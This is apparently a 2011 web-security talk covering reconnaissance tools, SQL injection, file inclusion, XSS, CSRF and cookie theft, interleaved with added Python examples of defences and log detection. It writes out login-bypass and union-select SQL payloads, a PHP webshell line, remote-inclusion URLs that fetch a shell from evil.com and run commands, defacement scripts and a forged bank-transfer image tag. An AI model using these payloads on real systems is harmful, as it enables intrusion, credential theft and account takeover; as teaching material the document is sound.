20 Sept 2011
Overview
Information Gathering
SQL Injection
File Inclusion
XSS (Cross Site Scripting)
Information Gathering
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 3
Finding an apple in a basket will be like finding a needle in a haystack if you don't know what an apple is!
- Syed Zainudeen -
xprobe2
Usage: xprobe2 <host>
e.g. xprobe2 www.website.com
nmap in action
amap
Manual:
nc / telnet/putty
Usage: nc <host> <port>
openssl
SQL Injection
SQL injection is like asking for extra plate/tissue/etc when all the waiter is expecting is your order
- Syed Zainudeen -
Login bypass
Logged in as admin!
The SQL without the comment is: SELECT * FROM accounts WHERE username='' OR 1=1 #' AND password=''
Boolean: OR TRUE
Means: all the rows will be returned, but since the first row is the username admin, we log in as admin.
Exploits of a Mom
xkcd.com/327
BTW, the rules won't help if you are facing a secure web application
' OR 1=1 #
' OR 1=1 -- '
' OR ''='
' OR 1=1 OR '
' OR 1=1 LIMIT 1#
... use your imagination (and logic)
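The login bypass above works because the username string is spliced into the SQL text, so the quote and comment characters change the statement's grammar. The following is an added example (not from the slides) that builds a throwaway SQLite accounts table, runs the concatenated query beside a parameterised one, and shows that only the former logs in as admin. The table contents and passwords are constructed; the `-- ` comment form from the list is used because SQLite does not understand MySQL's `#`.

```python
import sqlite3


# Constructed in-memory accounts table; rows and passwords are made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [("admin", "s3cret"), ("ali", "hunter2")],
    )
    return conn


def vulnerable_login(conn, username, password):
    # String concatenation: the input becomes part of the SQL grammar, so a
    # quote closes the literal and -- comments out the password check.
    sql = (
        "SELECT username FROM accounts WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    # Parameterised query: values travel separately from the statement text,
    # so quotes and comment markers are just characters to compare against.
    row = conn.execute(
        "SELECT username FROM accounts WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    # SQLite only understands the -- comment form; # is MySQL-specific.
    payload = "' OR 1=1 -- "
    return {
        "vulnerable": vulnerable_login(conn, payload, ""),  # first row: admin
        "safe": safe_login(conn, payload, ""),  # no such user: None
        "legit": safe_login(conn, "admin", "s3cret"),
    }


if __name__ == "__main__":
    print(demo())
```

The parameterised form needs no blacklist of quote characters: the driver never lets the value be parsed as SQL, which is why it also defeats the union-select variants rather than just the login bypass.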
Examples:
' union select group_concat(user,password),2,3 from users#
' union select group_concat(user,':',password),2,3 from users#
Pwned!
Installing a webshell
This is done using SELECT INTO OUTFILE. If we were attacking an XAMPP installation:
Pwned!!!
We access the shell through: http://<host>/test.php?c=<OS command>
File injection is akin to how a bacteriophage injects bacteria with its genetic material
- Syed Zainudeen -
include()
include() and other similar functions have the ability to include any file as part of the script that is currently executing.
Depending on the server configuration, include() can access not just local file paths, but also web URLs.
Sample attack
What if an attacker prepares a webshell script <?php system($_GET[c]); ?> and hosts it at http://evil.com/script.txt?
All the attacker needs to do now is invoke the web application with this URL:
http://website.com/?page=http://evil.com/script.txt&c=ls
RFI exploitation
1. Find a vulnerable URL
(e.g. http://192.168.0.1/web/index.php?page=login.php)
2. Host our script on a web server (e.g. http://evil.com/shell.txt)
3. Exploit it (run our script) by requesting
http://192.168.0.1/web/index.php?page=http://evil.com/shell.txt
In order to execute the dir command, we can request the following URL:
http://192.168.0.1/web/index.php?page=http://evil.com/shell.txt&c=dir
PWNED !!!
HOW DO WE GET OUR MALICIOUS SCRIPT TO THE SERVER IN THE FIRST PLACE ?
Once the script is accessible locally by the server, exploitation can proceed.
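The root cause in the include() slides is that the `page` parameter is handed to include() unchanged, so it can name a URL or a file the attacker placed on the server. This added example (not the slides' application, which is PHP; the names, directory and log lines are constructed) shows the fix a defender applies, an allowlist of page names mapped to fixed files, and a small scan over access-log lines that flags requests whose `page` value carries a URL scheme or path separator, which is the signature of the remote and local variants described above.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical allowlist: the only page names index.php may include, each
# mapped to a file under one fixed directory (names are constructed).
PAGES_DIR = "/var/www/app/pages"
PAGES = {"login.php": "login.php", "home.php": "home.php"}

# A URL scheme (remote include), a parent-directory hop, or any path
# separator in the page parameter is never legitimate for this allowlist.
SUSPICIOUS = re.compile(r"^[a-z][a-z0-9+.\-]*://|\.\.|[/\\]", re.IGNORECASE)


def is_allowed_page(value):
    return value in PAGES


def resolve_page(value):
    """Return the file index.php may include for ?page=<value>, else raise."""
    if not is_allowed_page(value):
        raise ValueError("refusing to include %r" % value)
    return posixpath.join(PAGES_DIR, PAGES[value])


def looks_like_inclusion_attempt(value):
    return bool(SUSPICIOUS.search(value))


def flag_requests(log_lines):
    """Scan combined-format access-log lines; return (line number, page value)
    for each request whose page parameter looks like a remote or local
    include of something outside the allowlist."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query)
        for value in query.get("page", []):
            if looks_like_inclusion_attempt(value):
                hits.append((number, value))
    return hits


# Constructed access-log lines (hosts and timestamps invented): a normal
# request, the remote include from the slides, and a local include of a
# file that was first uploaded to the server.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Sep/2011:10:00:01 +0800] "GET /web/index.php?page=login.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [20/Sep/2011:10:00:07 +0800] "GET /web/index.php?page=http://evil.com/shell.txt&c=dir HTTP/1.1" 200 88',
    '10.0.0.9 - - [20/Sep/2011:10:00:09 +0800] "GET /web/index.php?page=../uploads/shell.txt HTTP/1.1" 200 88',
]


if __name__ == "__main__":
    print(resolve_page("login.php"))
    print(flag_requests(SAMPLE_LOG))
```

The allowlist is the control; the regex is only a detection aid for reviewing logs of an application that has not been fixed yet. On the PHP side the same idea is complemented by disabling `allow_url_include` (and `allow_url_fopen` where unneeded) so include() cannot fetch URLs at all.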
What is XSS?
XSS is a vulnerability that allows an attacker to inject client-side code into a webpage.
The client-side code can be in any client-side language: JavaScript, CSS, HTML, etc.
Example:
What's your name: Ali<script>alert('XSS')</script>
XSS in action
Types of XSS
There are 2 types of XSS:
Reflected XSS (non-persistent)
Stored XSS (persistent)
Reflected vs Stored
In a reflected XSS, the injected string is used only once and discarded (not stored)
E.g. search function
In a stored XSS, the injected string is first stored in a DB and later loaded for display
E.g. forum, guestbook, log
Reflected XSS
The vulnerable page will only display user injected script if he/she follows a certain link/URL
The malicious script is visible in the URL (might be in encoded form). For example: http://abc.com/search?q=ball<script>alert(/XSS/)</script>
Stored XSS
The vulnerable page will display the user-injected script just by visiting the vulnerable site (that has been injected).
The malicious script is not visible in the URL (since it is usually loaded from the DB).
Webpage defacement
This is effective against stored XSS.
Creates an illusion of being hacked! (Not a real hack.)
The way to deface is up to the creativity of the attacker. Some examples:
<script>document.body.innerHTML="Hacked!"</script>
<iframe src="http://www.google.com" style="position:absolute; top:0; left:0; width:100%; height:100%"></iframe>
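Both reflected and stored XSS come down to the same defect: user input is copied into the page as markup. The following is an added example (not from the slides; the templates and guestbook list are constructed) that renders the "What's your name" input from the XSS slides with and without output encoding, and a minimal guestbook that stores entries raw and encodes them at display time, which is the stored-XSS case.

```python
from html import escape


def render_greeting_unsafe(name):
    # Reflected XSS: the input is copied into the page as markup.
    return "<p>What's your name: " + name + "</p>"


def render_greeting_safe(name):
    # Output encoding for HTML body context: & < > " ' become entities, so
    # the browser shows the tags as text instead of executing them.
    return "<p>What's your name: " + escape(name, quote=True) + "</p>"


# Constructed guestbook store: entries are kept exactly as submitted (the
# database is not where encoding belongs) and encoded when rendered.
def store_entry(guestbook, text):
    guestbook.append(text)


def render_guestbook(guestbook):
    items = "".join("<li>" + escape(entry, quote=True) + "</li>" for entry in guestbook)
    return "<ul>" + items + "</ul>"


def contains_script_tag(markup):
    # Crude check used only to compare the two renderings in this example.
    return "<script" in markup.lower()


# The sample input from the slides.
SAMPLE = "Ali<script>alert('XSS')</script>"


if __name__ == "__main__":
    print(render_greeting_unsafe(SAMPLE))
    print(render_greeting_safe(SAMPLE))
    book = []
    store_entry(book, SAMPLE)
    print(render_guestbook(book))
```

Encoding is context-specific: `html.escape` is right for text between tags and for quoted attribute values, but a value placed inside a `<script>` block, a URL, or a CSS property needs the encoding rules of that context instead.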
CSRF explained
Let's say that a user is logged in to a bank (Low Security Bank, lsbank.com).
The user then browses to another site that contains the following (XSS-injected) code:
<img src="http://lsbank.com/transfer?amount=1000&to=hacker_acc&submit=true" />
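The forged request works because the browser attaches the bank's session cookie to it automatically and the transfer endpoint accepts any request that carries that cookie. This added example (not the slides' bank, which is a hypothetical site; the secret, handler and request dicts are constructed) models a transfer handler that additionally requires a POST and a CSRF token bound to the session, and replays the `<img>` request, a forged POST without a token, and a genuine form submission against it.

```python
import hashlib
import hmac

# Hypothetical server-side secret (constructed for this example).
SERVER_SECRET = b"constructed-demo-secret"


def issue_csrf_token(session_id):
    # Token tied to the session: the bank embeds it in its own transfer form
    # as a hidden field. A page on another origin cannot read that form, so
    # it cannot supply the token (same-origin policy).
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(request):
    """request is a constructed dict: method, cookie (session id or None),
    form (submitted fields). Returns (status, message)."""
    session_id = request.get("cookie")
    if not session_id:
        return 401, "not logged in"
    if request.get("method") != "POST":
        # An <img src=...> can only produce a GET; state changes must not be
        # reachable that way.
        return 405, "transfers require POST"
    expected = issue_csrf_token(session_id)
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"
    form = request["form"]
    return 200, "transferred %s to %s" % (form["amount"], form["to"])


def demo():
    sid = "i45h0t3w4h"  # the session id from the slides; the browser sends it automatically
    forged_img = {"method": "GET", "cookie": sid,
                  "form": {"amount": "1000", "to": "hacker_acc", "submit": "true"}}
    forged_post = {"method": "POST", "cookie": sid,
                   "form": {"amount": "1000", "to": "hacker_acc"}}
    genuine = {"method": "POST", "cookie": sid,
               "form": {"amount": "1000", "to": "savings",
                        "csrf_token": issue_csrf_token(sid)}}
    return [handle_transfer(r)[0] for r in (forged_img, forged_post, genuine)]


if __name__ == "__main__":
    print(demo())  # [405, 403, 200]
```

The token check is what actually stops the attack; the POST-only rule just removes the `<img>` vector. A token stolen from one session is useless against another because it is keyed on the session id.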
Cookie stealing
In CSRF, an attacker issues a command that gets executed using the session information (cookie) of a victim.
The cookie is not captured in CSRF. The attacker doesn't know the victim's cookie.
But using XSS, we can steal the user's cookie.
If an attacker is able to steal cookie data from a victim, the attacker can basically do anything as the victim.
This script will cause the user's cookie to be sent to evil.com. The attacker can log the cookies using any server-side scripting language at evil.com.
Normal User
Each user has a unique session ID stored in their browser's cookie. The web server uses the session ID to differentiate between a normal user and the web admin.
SESSIONID=i45h0t3w4h
Attacker / Evil.com
Due to an XSS vulnerability in the web server, an attacker has injected some JavaScript code that steals visitors' session IDs.
Attacker
The attacker then uses the stolen session ID to communicate with the web server. The attacker will be treated as the Web Admin and can do whatever the Web Admin can, since he/she has the session ID of the Web Admin.
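The session-hijack sequence above depends on two things: the script can read the cookie, and the server accepts whoever presents it. This added example (not from the slides; the header builder and audit function are constructed) issues the session cookie with the HttpOnly, Secure and SameSite attributes, which keep injected JavaScript from reading it and keep the browser from sending it on cross-site requests, and includes an audit function that reports which of those attributes a Set-Cookie header lacks, so the slides' plain `SESSIONID=i45h0t3w4h` cookie can be checked against it.

```python
import secrets

REQUIRED_FLAGS = ("HttpOnly", "Secure", "SameSite")


def new_session_id():
    # 32 random bytes, URL-safe: unguessable, unlike a short fixed-format id,
    # so the only way to obtain it is to read it from the victim's browser.
    return secrets.token_urlsafe(32)


def build_session_cookie(session_id, max_age=3600):
    # HttpOnly: document.cookie cannot read it, so an XSS payload cannot ship
    #   it to evil.com (the server still receives it on every request).
    # Secure: never sent over plaintext HTTP, so it cannot be sniffed.
    # SameSite=Lax: not attached to cross-site requests such as the <img>
    #   transfer request, which blunts CSRF as well.
    return "SESSIONID=%s; Path=/; Max-Age=%d; HttpOnly; Secure; SameSite=Lax" % (
        session_id, max_age)


def audit_set_cookie(header):
    """Return the hardening attributes missing from a Set-Cookie header value."""
    parts = header.split(";")[1:]  # skip the name=value pair itself
    attrs = [part.strip().split("=", 1)[0].lower() for part in parts]
    return [flag for flag in REQUIRED_FLAGS if flag.lower() not in attrs]


if __name__ == "__main__":
    print(audit_set_cookie("SESSIONID=i45h0t3w4h; Path=/"))  # all three missing
    print(build_session_cookie(new_session_id()))
```

HttpOnly does not stop XSS itself, only the cookie theft shown on these slides: an injected script can still issue requests as the victim while the page is open, so output encoding remains the primary fix and the cookie flags are defence in depth. Rotating the session id at login also limits how long a stolen id stays useful.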
Thank you !